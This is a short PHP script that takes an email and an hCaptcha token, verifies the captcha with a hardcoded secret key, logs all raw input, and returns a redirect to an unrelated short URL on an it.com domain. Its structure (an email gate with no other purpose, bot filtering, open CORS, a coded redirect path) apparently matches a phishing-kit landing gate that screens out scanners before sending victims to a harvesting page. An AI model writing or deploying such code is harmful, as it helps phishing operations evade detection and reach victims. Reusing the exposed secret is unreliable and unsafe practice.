<?php
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: POST, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type, X-Requested-With");

header('Content-Type: application/json; charset=UTF-8');
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: SAMEORIGIN');
header('Referrer-Policy: no-referrer-when-downgrade');
header('Permissions-Policy: interest-cohort=()');
header('Strict-Transport-Security: max-age=31536000; includeSubDomains; preload');

session_start();

// hCaptcha Secret Key
const HCAPTCHA_SECRET = 'ES_4288392b1c5f4195ba59d23a4be66942';

// Enable error logging
error_reporting(E_ALL);
ini_set('log_errors', 1);
ini_set('error_log', __DIR__ . '/php-error.log');

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit(json_encode(['success' => false, 'error' => 'Method Not Allowed']));
}

if (!isset($_SERVER['HTTP_X_REQUESTED_WITH']) || strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') {
    http_response_code(403);
    exit(json_encode(['success' => false, 'error' => 'Unauthorized access']));
}

$inputJSON = file_get_contents('php://input');
$data = json_decode($inputJSON, true);

$email = filter_var($data['email'] ?? '', FILTER_SANITIZE_EMAIL);
$captchaResponse = trim($data['captchaResponse'] ?? '');

error_log('ðŸ“Œ Received Data: ' . json_encode($data));

if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    http_response_code(400);
    exit(json_encode(['success' => false, 'error' => 'Invalid email address.']));
}

if (empty($captchaResponse)) {
    http_response_code(400);
    exit(json_encode(['success' => false, 'error' => 'Missing hCaptcha response.']));
}

// Verify hCaptcha
$ch = curl_init('https://api.hcaptcha.com/siteverify');
curl_setopt_array($ch, [
    CURLOPT_POST => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_SSL_VERIFYPEER => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'secret'   => HCAPTCHA_SECRET,
        'response' => $captchaResponse,
        'remoteip' => $_SERVER['REMOTE_ADDR']
    ]),
]);

$response = curl_exec($ch);
$curl_error = curl_error($ch);
curl_close($ch);

$responseData = json_decode($response, true);
error_log('ðŸ›  hCaptcha API Response: ' . json_encode($responseData));

if (!$responseData['success']) {
    http_response_code(401);
    exit(json_encode(['success' => false, 'error' => 'hCaptcha validation failed']));
}

// Generate Token & Redirect
$redirectUrl = 'https://jali.ascended.it.com/7pmHm';
exit(json_encode(['success' => true, 'redirectUrl' => $redirectUrl]));
